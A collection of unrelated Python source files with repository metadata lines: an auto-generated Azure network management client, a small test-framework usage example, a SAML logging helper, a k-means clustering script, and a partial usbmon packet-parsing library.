from .operations import PublicIPAddressesOperations
from .operations import PublicIPPrefixesOperations
from .operations import RouteFiltersOperations
from .operations import RouteFilterRulesOperations
from .operations import RouteTablesOperations
from .operations import RoutesOperations
from .operations import BgpServiceCommunitiesOperations
from .operations import UsagesOperations
from .operations import VirtualNetworksOperations
from .operations import SubnetsOperations
from .operations import VirtualNetworkPeeringsOperations
from .operations import VirtualNetworkGatewaysOperations
from .operations import VirtualNetworkGatewayConnectionsOperations
from .operations import LocalNetworkGatewaysOperations
from .operations import VirtualWANsOperations
from .operations import VpnSitesOperations
from .operations import VpnSitesConfigurationOperations
from .operations import VirtualHubsOperations
from .operations import HubVirtualNetworkConnectionsOperations
from .operations import VpnGatewaysOperations
from .operations import VpnConnectionsOperations
from .operations import ServiceEndpointPoliciesOperations
from .operations import ServiceEndpointPolicyDefinitionsOperations
from . import models
class NetworkManagementClient(NetworkManagementClientOperationsMixin):
"""Network Client.
:ivar azure_firewalls: AzureFirewallsOperations operations
:vartype azure_firewalls: azure.mgmt.network.v2018_07_01.operations.AzureFirewallsOperations
:ivar application_gateways: ApplicationGatewaysOperations operations
:vartype application_gateways: azure.mgmt.network.v2018_07_01.operations.ApplicationGatewaysOperations
:ivar application_security_groups: ApplicationSecurityGroupsOperations operations
:vartype application_security_groups: azure.mgmt.network.v2018_07_01.operations.ApplicationSecurityGroupsOperations
:ivar ddos_protection_plans: DdosProtectionPlansOperations operations
:vartype ddos_protection_plans: azure.mgmt.network.v2018_07_01.operations.DdosProtectionPlansOperations
:ivar available_endpoint_services: AvailableEndpointServicesOperations operations
:vartype available_endpoint_services: azure.mgmt.network.v2018_07_01.operations.AvailableEndpointServicesOperations
:ivar express_route_circuit_authorizations: ExpressRouteCircuitAuthorizationsOperations operations
:vartype express_route_circuit_authorizations: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitAuthorizationsOperations
:ivar express_route_circuit_peerings: ExpressRouteCircuitPeeringsOperations operations
:vartype express_route_circuit_peerings: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitPeeringsOperations
:ivar express_route_circuit_connections: ExpressRouteCircuitConnectionsOperations operations
:vartype express_route_circuit_connections: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitConnectionsOperations
:ivar express_route_circuits: ExpressRouteCircuitsOperations operations
:vartype express_route_circuits: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCircuitsOperations
:ivar express_route_service_providers: ExpressRouteServiceProvidersOperations operations
:vartype express_route_service_providers: azure.mgmt.network.v2018_07_01.operations.ExpressRouteServiceProvidersOperations
:ivar express_route_cross_connections: ExpressRouteCrossConnectionsOperations operations
:vartype express_route_cross_connections: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCrossConnectionsOperations
:ivar express_route_cross_connection_peerings: ExpressRouteCrossConnectionPeeringsOperations operations
:vartype express_route_cross_connection_peerings: azure.mgmt.network.v2018_07_01.operations.ExpressRouteCrossConnectionPeeringsOperations
:ivar load_balancers: LoadBalancersOperations operations
:vartype load_balancers: azure.mgmt.network.v2018_07_01.operations.LoadBalancersOperations
:ivar load_balancer_backend_address_pools: LoadBalancerBackendAddressPoolsOperations operations
:vartype load_balancer_backend_address_pools: azure.mgmt.network.v2018_07_01.operations.LoadBalancerBackendAddressPoolsOperations
:ivar load_balancer_frontend_ip_configurations: LoadBalancerFrontendIPConfigurationsOperations operations
:vartype load_balancer_frontend_ip_configurations: azure.mgmt.network.v2018_07_01.operations.LoadBalancerFrontendIPConfigurationsOperations
:ivar inbound_nat_rules: InboundNatRulesOperations operations
:vartype inbound_nat_rules: azure.mgmt.network.v2018_07_01.operations.InboundNatRulesOperations
:ivar load_balancer_load_balancing_rules: LoadBalancerLoadBalancingRulesOperations operations
:vartype load_balancer_load_balancing_rules: azure.mgmt.network.v2018_07_01.operations.LoadBalancerLoadBalancingRulesOperations
:ivar load_balancer_network_interfaces: LoadBalancerNetworkInterfacesOperations operations
:vartype load_balancer_network_interfaces: azure.mgmt.network.v2018_07_01.operations.LoadBalancerNetworkInterfacesOperations
:ivar load_balancer_probes: LoadBalancerProbesOperations operations
:vartype load_balancer_probes: azure.mgmt.network.v2018_07_01.operations.LoadBalancerProbesOperations
:ivar network_interfaces: NetworkInterfacesOperations operations
:vartype network_interfaces: azure.mgmt.network.v2018_07_01.operations.NetworkInterfacesOperations
:ivar network_interface_ip_configurations: NetworkInterfaceIPConfigurationsOperations operations
:vartype network_interface_ip_configurations: azure.mgmt.network.v2018_07_01.operations.NetworkInterfaceIPConfigurationsOperations
:ivar network_interface_load_balancers: NetworkInterfaceLoadBalancersOperations operations
:vartype network_interface_load_balancers: azure.mgmt.network.v2018_07_01.operations.NetworkInterfaceLoadBalancersOperations
:ivar network_security_groups: NetworkSecurityGroupsOperations operations
:vartype network_security_groups: azure.mgmt.network.v2018_07_01.operations.NetworkSecurityGroupsOperations
:ivar security_rules: SecurityRulesOperations operations
:vartype security_rules: azure.mgmt.network.v2018_07_01.operations.SecurityRulesOperations
:ivar default_security_rules: DefaultSecurityRulesOperations operations
:vartype default_security_rules: azure.mgmt.network.v2018_07_01.operations.DefaultSecurityRulesOperations
:ivar network_watchers: NetworkWatchersOperations operations
:vartype network_watchers: azure.mgmt.network.v2018_07_01.operations.NetworkWatchersOperations
:ivar packet_captures: PacketCapturesOperations operations
:vartype packet_captures: azure.mgmt.network.v2018_07_01.operations.PacketCapturesOperations
:ivar connection_monitors: ConnectionMonitorsOperations operations
:vartype connection_monitors: azure.mgmt.network.v2018_07_01.operations.ConnectionMonitorsOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.network.v2018_07_01.operations.Operations
:ivar public_ip_addresses: PublicIPAddressesOperations operations
:vartype public_ip_addresses: azure.mgmt.network.v2018_07_01.operations.PublicIPAddressesOperations
:ivar public_ip_prefixes: PublicIPPrefixesOperations operations
:vartype public_ip_prefixes: azure.mgmt.network.v2018_07_01.operations.PublicIPPrefixesOperations
:ivar route_filters: RouteFiltersOperations operations
:vartype route_filters: azure.mgmt.network.v2018_07_01.operations.RouteFiltersOperations
:ivar route_filter_rules: RouteFilterRulesOperations operations
:vartype route_filter_rules: azure.mgmt.network.v2018_07_01.operations.RouteFilterRulesOperations
:ivar route_tables: RouteTablesOperations operations
:vartype route_tables: azure.mgmt.network.v2018_07_01.operations.RouteTablesOperations
:ivar routes: RoutesOperations operations
:vartype routes: azure.mgmt.network.v2018_07_01.operations.RoutesOperations
:ivar bgp_service_communities: BgpServiceCommunitiesOperations operations
:vartype bgp_service_communities: azure.mgmt.network.v2018_07_01.operations.BgpServiceCommunitiesOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.network.v2018_07_01.operations.UsagesOperations
:ivar virtual_networks: VirtualNetworksOperations operations
:vartype virtual_networks: azure.mgmt.network.v2018_07_01.operations.VirtualNetworksOperations
:ivar subnets: SubnetsOperations operations
:vartype subnets: azure.mgmt.network.v2018_07_01.operations.SubnetsOperations
:ivar virtual_network_peerings: VirtualNetworkPeeringsOperations operations
:vartype virtual_network_peerings: azure.mgmt.network.v2018_07_01.operations.VirtualNetworkPeeringsOperations
:ivar virtual_network_gateways: VirtualNetworkGatewaysOperations operations
:vartype virtual_network_gateways: azure.mgmt.network.v2018_07_01.operations.VirtualNetworkGatewaysOperations
:ivar virtual_network_gateway_connections: VirtualNetworkGatewayConnectionsOperations operations
:vartype virtual_network_gateway_connections: azure.mgmt.network.v2018_07_01.operations.VirtualNetworkGatewayConnectionsOperations
:ivar local_network_gateways: LocalNetworkGatewaysOperations operations
:vartype local_network_gateways: azure.mgmt.network.v2018_07_01.operations.LocalNetworkGatewaysOperations
:ivar virtual_wans: VirtualWANsOperations operations
:vartype virtual_wans: azure.mgmt.network.v2018_07_01.operations.VirtualWANsOperations
:ivar vpn_sites: VpnSitesOperations operations
:vartype vpn_sites: azure.mgmt.network.v2018_07_01.operations.VpnSitesOperations
:ivar vpn_sites_configuration: VpnSitesConfigurationOperations operations
:vartype vpn_sites_configuration: azure.mgmt.network.v2018_07_01.operations.VpnSitesConfigurationOperations
:ivar virtual_hubs: VirtualHubsOperations operations
:vartype virtual_hubs: azure.mgmt.network.v2018_07_01.operations.VirtualHubsOperations
:ivar hub_virtual_network_connections: HubVirtualNetworkConnectionsOperations operations
:vartype hub_virtual_network_connections: azure.mgmt.network.v2018_07_01.operations.HubVirtualNetworkConnectionsOperations
:ivar vpn_gateways: VpnGatewaysOperations operations
:vartype vpn_gateways: azure.mgmt.network.v2018_07_01.operations.VpnGatewaysOperations
:ivar vpn_connections: VpnConnectionsOperations operations
:vartype vpn_connections: azure.mgmt.network.v2018_07_01.operations.VpnConnectionsOperations
:ivar service_endpoint_policies: ServiceEndpointPoliciesOperations operations
:vartype service_endpoint_policies: azure.mgmt.network.v2018_07_01.operations.ServiceEndpointPoliciesOperations
:ivar service_endpoint_policy_definitions: ServiceEndpointPolicyDefinitionsOperations operations
:vartype service_endpoint_policy_definitions: azure.mgmt.network.v2018_07_01.operations.ServiceEndpointPolicyDefinitionsOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: The subscription credentials which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential, # type: "TokenCredential"
subscription_id, # type: str
base_url=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
if not base_url:
base_url = 'https://management.azure.com'
self._config = NetworkManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.azure_firewalls = AzureFirewallsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.application_gateways = ApplicationGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.application_security_groups = ApplicationSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.ddos_protection_plans = DdosProtectionPlansOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_endpoint_services = AvailableEndpointServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_authorizations = ExpressRouteCircuitAuthorizationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_peerings = ExpressRouteCircuitPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_connections = ExpressRouteCircuitConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuits = ExpressRouteCircuitsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_service_providers = ExpressRouteServiceProvidersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connections = ExpressRouteCrossConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connection_peerings = ExpressRouteCrossConnectionPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancers = LoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_backend_address_pools = LoadBalancerBackendAddressPoolsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_frontend_ip_configurations = LoadBalancerFrontendIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.inbound_nat_rules = InboundNatRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_load_balancing_rules = LoadBalancerLoadBalancingRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_network_interfaces = LoadBalancerNetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_probes = LoadBalancerProbesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interfaces = NetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_ip_configurations = NetworkInterfaceIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_load_balancers = NetworkInterfaceLoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_security_groups = NetworkSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.security_rules = SecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.default_security_rules = DefaultSecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_watchers = NetworkWatchersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.packet_captures = PacketCapturesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.connection_monitors = ConnectionMonitorsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_addresses = PublicIPAddressesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_prefixes = PublicIPPrefixesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filters = RouteFiltersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filter_rules = RouteFilterRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_tables = RouteTablesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.routes = RoutesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.bgp_service_communities = BgpServiceCommunitiesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_networks = VirtualNetworksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.subnets = SubnetsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_peerings = VirtualNetworkPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateways = VirtualNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateway_connections = VirtualNetworkGatewayConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.local_network_gateways = LocalNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_wans = VirtualWANsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites = VpnSitesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites_configuration = VpnSitesConfigurationOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_hubs = VirtualHubsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.hub_virtual_network_connections = HubVirtualNetworkConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_gateways = VpnGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_connections = VpnConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policies = ServiceEndpointPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policy_definitions = ServiceEndpointPolicyDefinitionsOperations(
self._client, self._config, self._serialize, self._deserialize)
def _send_request(self, http_request, **kwargs):
# type: (HttpRequest, Any) -> HttpResponse
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.HttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
def close(self):
# type: () -> None
self._client.close()
def __enter__(self):
# type: () -> NetworkManagementClient
self._client.__enter__()
return self
def __exit__(self, *exc_details):
# type: (Any) -> None
self._client.__exit__(*exc_details)
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_07_01/_network_management_client.py | Python | mit | 23,821 |
from test_unit_module import test_unit
class Usage(test_unit):
def __init__(self):
pass
def test_case_0(self):
"""
Example of a passing test case.
"""
actual = 8 # 3+5
expected = 8
self.assert_op(actual,expected,0) # Actual result, Expected result, test case id or identifier(not optional), HINT (Optional)
def test_case_1(self):
"""
Example of a failing test case without a hint.
"""
actual = 9 # 3+5 !=9
expected = 8
self.assert_op(actual,expected,1)
def test_case_2(self):
"""
Example of a failing test case with a hint
"""
actual = 9 # 3+5 !=9
expected = 8
self.assert_op(actual,expected, 2,"Addition is not done right.")
# NOTE : There is a third parameter. It is an optional parameter and will be used a hint ONLY IF the test case FAILS.
def main():
suite = Usage()
suite.run_tests()
if __name__ == "__main__":
main()
| budhiraja/Test-Unit | usage_test_unit.py | Python | mit | 890 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import structlog
def get_saml_logger():
"""
Get a logger named `saml2idp` after the main package.
"""
return structlog.get_logger('saml2idp')
| mobify/dj-saml-idp | saml2idp/logging.py | Python | mit | 257 |
#!/usr/bin/python3
# Filename: k_means_cluster.py
"""
A Machine learning algorithm for K mean clustering.
Date: 24th March, 2015 pm
"""
__author__ = "Anthony Wanjohi"
__version__ = "1.0.0"
import random, fractions
def euclidean_distance(point, centroid):
'''Returns the euclidean distance between two points'''
assert type(point) is tuple
assert type(centroid) is tuple
#x and y values for the point and the centroid
point_x, point_y = point
centroid_x, centroid_y = centroid
#get euclidean distance
distance = ( (point_x - centroid_x) ** 2 ) + ( (point_y - centroid_y) ** 2 )
distance = distance ** (0.5)
return round(distance, 4)
def get_coordinates(points):
#get coordinates for the points given in tuple form
print("Please provide coordinates for the {} points. (x, y)".format(points))
coordinates = []
for coords in range(points):
#read as a tuple i.e (x, y)
user_coords = input()
user_coords = user_coords.split(',')
x, y = int(user_coords[0]), int(user_coords[1])
coordinates.append((x, y))
return coordinates
def get_coords(file_name):
'''Get coordinates from a file.'''
file_handle = open(file_name, "r")
file_coords = []
for content in file_handle:
content = content.replace(' ', "").replace("\n", "").replace('"', "").split(',')
coord = int(content[0]), int(content[1])
file_coords.append(coord)
return file_coords
def get_group_matrix(coords, centroid_one, centroid_two):
'''Returns a group matrix'''
euclid_distance = []
grp_matrix = []
for y in coords:
#get distance for each point in regard to centroid one
distance_one = euclidean_distance(y, centroid_one)
#get distance for each point in regard to centroid two
distance_two = euclidean_distance(y, centroid_two)
euclid_distance.append((distance_one, distance_two))
#group matrix condtions
if distance_one > distance_two:
grp_matrix.append((0, 1))
elif distance_one < distance_two:
grp_matrix.append((1, 0))
return grp_matrix
def get_avg_centroid(x_y_index, coords):
'''Returns new centroid coordinates if more than 1 point eppears in any cluster'''
x_coords, y_coords = [], []
for index in x_y_index:
#new_points.append(coords[index])
x, y = coords[index]
x_coords.append(x)
y_coords.append(y)
#get average of both x and y coords
x_coords = round(sum(x_coords) / (len(x_coords) * 1.0), 4)
y_coords = round(sum(y_coords) / (len(y_coords) * 1.0), 4)
centroid = (x_coords, y_coords)
return centroid
def k_means_clustering(points):
'''Return the group matrix given coordinates'''
coords = get_coordinates(points)
centroids = []
euclid_distance = []
group_distance = []
grp_matrix = []
#create an alphabet number mapping
alphabets = dict(A = 1,B = 2,C = 3,D = 4,E = 5,F = 6,G = 7,H = 8,I = 9,J = 10,K = 11,L = 12,M = 13,
N = 14,O = 15,P = 16,Q = 17,R = 18,S = 19,T = 20,U = 21,V = 22,W = 23,X = 24,Y = 25,Z = 26)
#get two random centroids
i = 0
limit = 2
#ensure that the points are not similar
while i <= limit:
k = random.randint(0, (points-1))
if k not in centroids:
centroids.append(k)
if len(centroids) is not 2:
limit *= 2
else:
break
#get the centroids as per the above rand positions
centroids = tuple(centroids)
i, j = centroids
centroid_one = coords[i]
centroid_two = coords[j]
print("\nRandom Centroids->",centroid_one, centroid_two)
#get the group matrix
grp_matrix = get_group_matrix(coords, centroid_one, centroid_two)
while True:
#iterate till group matrix is stable
#get the number of points in each cluster
a, b, m_index_values, n_index_values = [], [], [], []
for index, x_y_values in enumerate(grp_matrix):
m, n = x_y_values
a.append(m)
b.append(n)
if m == 1:
m_index_values.append(index)
elif n == 1:
n_index_values.append(index)
cluster_one_elems = sum(a)
cluster_two_elems = sum(b)
if cluster_one_elems == 1:
#use the same centroid from the previous one
centroid_one = centroid_one
elif cluster_one_elems > 1:
#new centroid is the average of the elements
centroid_one = get_avg_centroid(m_index_values, coords)
if cluster_two_elems == 1:
#use the same centroid used in the last iteration
centroid_two = centroid_two
elif cluster_two_elems > 1:
#new centroid is the average of the elements
centroid_two= get_avg_centroid(n_index_values, coords)
print("New Centroids->",centroid_one, centroid_two)
#get new group matrix
new_grp_matrix = get_group_matrix(coords, centroid_one, centroid_two)
#when no more change happens, stop iteration
if new_grp_matrix == grp_matrix:
return grp_matrix
grp_matrix = new_grp_matrix
if __name__ == "__main__":
guess = int(input('Enter the number of coordinates to input : '))
print(k_means_clustering(guess))
| TonyHinjos/Machine-Learning-Algorithms-Toolkit | k-means-clustering/k_means_cluster.py | Python | mit | 4,794 |
#!/usr/bin/env python
#
# Copyright (C) 2011 Austin Leirvik <aua at pdx.edu>
# Copyright (C) 2011 Wil Cooley <wcooley at pdx.edu>
# Copyright (C) 2011 Joanne McBride <[email protected]>
# Copyright (C) 2011 Danny Aley <[email protected]>
# Copyright (C) 2011 Erich Ulmer <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Core USB REVue classes: PackedFields, Packet and SetupField.
* PackedFields represents a generic interface to unpacking and repacking
data based on a table.
* Packet represents a USBMon packet.
* SetupField represents the 'setup' attribute of the Packet.
"""
__version__ = '0.0.1'
#import sys
from array import array
from collections import MutableSequence, Sequence
from functools import partial
from logging import debug
from pprint import pprint, pformat
from struct import unpack_from, pack_into, unpack
import datetime
#import logging
#logging.basicConfig(level=logging.DEBUG)
from util import reverse_update_dict, apply_mask
USBMON_PACKET_FORMAT = dict(
# Attr fmt offset
urb = ('<Q', 0),
event_type = ('<c', 8),
xfer_type = ('<B', 9),
epnum = ('<B', 10),
devnum = ('<B', 11),
busnum = ('<H', 12),
flag_setup = ('<c', 14),
flag_data = ('<c', 15),
ts_sec = ('<q', 16),
ts_usec = ('<i', 24),
status = ('<i', 28),
length = ('<I', 32),
len_cap = ('<I', 36),
setup = ('<8s', 40),
error_count = ('<i', 40),
numdesc = ('<i', 44),
interval = ('<i', 48),
start_frame = ('<i', 52),
xfer_flags = ('<I', 56),
ndesc = ('<I', 60),
data = ('<%dB', 64),
)
# Note that the packet transfer type has different numeric identifiers then the
# endpoint control types in the Linux kernel headers <linux/usb/ch9.h>:
#define USB_ENDPOINT_XFER_CONTROL 1
#define USB_ENDPOINT_XFER_ISOC 1
#define USB_ENDPOINT_XFER_BULK 2
#define USB_ENDPOINT_XFER_INT 3
USBMON_TRANSFER_TYPE = dict(
isochronous = 0,
interrupt = 1,
control = 2,
bulk = 3,
)
# Add the reverse to the dict for convenience
reverse_update_dict(USBMON_TRANSFER_TYPE)
class PackedFields(object):
"""Base class for field decodings/unpacking.
The PackedFields class provides access to named fields in binary data with
on-demand packing and unpacking.
A PackedFields object is defined by a format table and sequence of data.
The format table lists the name of the field (which becomes an object
attribute), a ``struct`` format code and byte offset.
The format table is a dict with entries with the following format:
key: (format, offset)
"""
# This must exist so __setattr__ can find key 'format_table' missing from
# self.format_table when it is being initialized.
format_table = dict()
def __init__(self, format_table=None, datapack=None, update_parent=None):
"""Takes as arguments:
1. format_table
Described above
2. datapack
String or array of packed data
3. update_parent
Call-back function to enable attribute changes to flow up a
heirarchy of PackedField objects. It requires, as argument, the
datapack of the sub-object. Can be None.
"""
self._cache = dict()
if format_table != None:
self.format_table = format_table
self.datapack = datapack
self.update_parent = update_parent
def cache(self, attr, lookup_func):
if not self._cache.has_key(attr):
self._cache[attr] = lookup_func(attr)
return self._cache[attr]
# Generic attribute accessor
# Note that we unpack the single item from the tuple in __getattr__ due to
# setup()
def unpacket(self, attr, fmtx=None):
"""Unpack attr from self.datapack using (struct) format string and
offset from self.format_table. fmtx can be used to provide additional
data for string-formatting that may be in the format string.
Returns the tuple of data as from struct.unpack_from."""
fmt, offset = self.format_table[attr]
if fmtx != None: fmt %= fmtx
return unpack_from(fmt, self.datapack, offset)
def __getattr__(self, attr):
"""Pull attr from cache, looking it up with unpacket if necessary."""
return self.cache(attr, lambda a: self.unpacket(a)[0])
def repacket(self, attr, vals, fmtx=None):
"""Repack attr into self.datapack using (struct) format string and
offset from self.format_table. fmtx can be used to provide additional
data for string-formatting that may be in the format string."""
debug('repacket: attr: {0}, vals: {1}, fmtx: {2}'.format(attr,
pformat(vals), fmtx))
fmt, offset = self.format_table[attr]
if fmtx != None: fmt %= fmtx
return pack_into(fmt, self.datapack, offset, *vals)
def __setattr__(self, attr, val):
"""__setattr__ is called went setting all attributes, so it must
differentiate between tabled-based attributes and regular attributes.
If the attribute is not a key in self.format_table, then it calls up to
``object``'s __setattr__, which handles "normal" attributes,
properties, etc."""
if attr in self.format_table:
self._cache[attr] = val
self.repacket(attr, [val])
if self.update_parent != None:
self.update_parent(self.datapack)
else:
# This makes properties and non-format_table attributes work
object.__setattr__(self, attr, val)
# Implementing __getitem__ and __setitem__ permit the object to be used as
# a mapping type, so it can be used as e.g. the global or local namespace
# with 'eval'.
def __getitem__(self, attr):
"""Allows instance to be accessed as dict using attributes as keys."""
return getattr(self, attr)
def __setitem__(self, attr, val):
"""Allows instance to be updated as dict using attributes as keys."""
setattr(self, attr, val)
@property
def datapack(self):
"""Holds the array containing the data which is packed into or unpacked
from."""
return self.__dict__['datapack']
@datapack.setter
def datapack(self, value):
if isinstance(value, Sequence) and \
not isinstance(value, MutableSequence):
self.__dict__['datapack'] = array('c', value)
else:
self.__dict__['datapack'] = value
def repack(self):
"""
Returns a string representation of the datapack.
"""
return self.datapack.tostring()
def __eq__(self, other):
return self.datapack == other.datapack
def __ne__(self, other):
return self.datapack != other.datapack
class Packet(PackedFields):
"""The ``Packet`` class adds higher-level semantics over the lower-level
field packing and unpacking.
The following attributes are extracted dynamically from the packet data and
re-packed into the data when assigned to.
* urb
* event_type
* xfer_type
* epnum
* devnum
* busnum
* flag_setup
* flag_data
* ts_sec
* ts_usec
* status
* length
* len_cap
* xfer_flags
* ndesc
* data
Other attributes are extracted dynamically but require more implementation
than PackedFields provides by default and thus are separate properties with
their own docstrings.
These attributes correspond with the struct usbmon_packet data members from:
http://www.kernel.org/doc/Documentation/usb/usbmon.txt
"""
def __init__(self, hdr=None, pack=None):
"""Requires a libpcap/pcapy header and packet data."""
super(Packet, self).__init__()
self.format_table = USBMON_PACKET_FORMAT
if None not in (hdr, pack):
if len(pack) < 64:
raise RuntimeError("Not a USB Packet")
self._hdr = hdr
self.datapack = array('c', pack)
if self.event_type not in ['C', 'S', 'E'] or \
self.xfer_type not in USBMON_TRANSFER_TYPE.values():
raise RuntimeError("Not a USB Packet")
@property
def hdr(self):
"""Accessor for libpcap header."""
return self._hdr
def diff(self, other):
"""Compare self with other packet.
Return list of 3-tuples of (attr, my_val, other_val)."""
result = list()
for f in self.fields:
m = getattr(self, f)
o = getattr(other, f)
if m != o:
result.append((f, m, o))
return result
@property
def field_dict(self):
"""Return a dict of attributes and values."""
pdict = dict()
for attr in USBMON_PACKET_FORMAT:
pdict[attr] = getattr(self, attr)
return pdict
@property
def fields(self):
"""Return a list of packet header fields"""
return [ attr for attr in USBMON_PACKET_FORMAT ]
@property
def datalen(self):
"""Return the length of the data payload of the packet."""
return len(self.datapack) - 64
# Special attribute accessors that have additional restrictions
@property
def data(self):
"""Data payload. Note that while there is only a get accessor for this
attribute, it is a list and is therefore mutable. It cannot, however,
be easily grown or shrunk."""
return self.cache('data',
lambda a: list(self.unpacket(a, self.datalen)))
def data_hexdump(self, maxlen=None):
"""Space-delimited dump of data in hex"""
return ' '.join(map(lambda x: '%02X' % x, self.data[:maxlen]))
def repack(self):
"""Returns the packet data as a string, taking care to repack any
"loose" attributes."""
self.repacket('data', self.data, self.datalen)
return super(Packet, self).repack()
@property
def setup(self):
"""An instance of the SetupField class."""
def _update_setup(self, datapack):
self.repacket('setup', [datapack.tostring()])
if self.is_setup_packet:
return self.cache('setup',
lambda a:
SetupField(self.unpacket(a)[0],
partial(_update_setup, self)))
# error_count and numdesc are only meaningful for isochronous transfers
# (xfer_type == 0)
@property
def error_count(self):
"""Isochronous error_count"""
if self.is_isochronous_xfer:
return self.cache('error_count', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
@property
def numdesc(self):
"""Isochronous numdesc"""
if self.is_isochronous_xfer:
return self.cache('numdesc', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
# interval is only meaningful for isochronous or interrupt transfers
# (xfer_type in [0,1])
@property
def interval(self):
"""Isochronous/interrupt interval"""
if self.is_isochronous_xfer or self.is_interrupt_xfer:
return self.cache('interval', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
@property
def start_frame(self):
"""Isochronous start_frame"""
# start_frame is only meaningful for isochronous transfers
if self.is_isochronous_xfer:
return self.cache('start_frame', lambda a: self.unpacket(a)[0])
else:
# FIXME Raise WrongPacketXferType instead
return 0
# Boolean tests for transfer types
@property
def is_isochronous_xfer(self):
"""Boolean test if transfer-type is isochronous"""
